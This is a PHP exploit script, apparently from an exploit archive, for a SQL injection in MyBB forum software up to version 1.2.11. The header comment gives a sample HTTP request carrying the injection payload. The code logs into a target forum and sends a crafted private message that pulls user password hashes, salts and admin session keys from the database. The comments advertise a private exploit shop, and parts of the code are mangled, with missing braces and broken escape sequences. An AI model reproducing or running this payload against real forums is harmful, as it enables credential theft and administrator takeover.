// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with <3 from ru_antichat',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=4),(select password from mybb_users where uid=4),(select salt from mybb_users where uid=4),admin_sid',(select sid from mybb_adminsessions where uid=4),'admin_loginkey',(select loginkey from mybb_adminsessions where uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08 error_reporting(0);
@ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8rn");
header("Pragma: no-cache"); ?>
} if (!$_GET)
if (isset($_GET['f**k_mybb']))
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http://localhost/mybb_1210/index.php'; function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1rn";
$send_http .= "Host: $hostrn";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv: Gecko/20180515 Firefox/";
$send_http .= "Cookie: $cook1ern";
$send_http .= "Content-Type: application/x-www-form-urlencodedrn";
$send_http .= "Content-Length: ".strlen($data_gp)."rn";
$send_http .= "Connection: Closernrn";
if ($method === 'POST')
$send_http .= $data_gp;
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
return $s;
} echo '
- start....';myflush(50000); $get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'f**kkk');
echo '
- login '.$username.' with passwd = '.$pwd.' done';myflush(50000); foreach ($get_cookie as $value)
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
echo '
- cookie: '.$cookie;myflush(50000); preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '
- user id: '.$get_uid;myflush(50000); $data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with <3 from antichat.ru',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=$uid_needed),(select password from mybb_users where uid=$uid_needed),(select salt from mybb_users where uid=$uid_needed),' admin sid',(select sid from mybb_adminsessions where uid=$uid_needed),' admin loginkey',(select loginkey from mybb_adminsessions where uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '
- send exploit:-------------------
look you private messages 4 admin passwd hash http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'';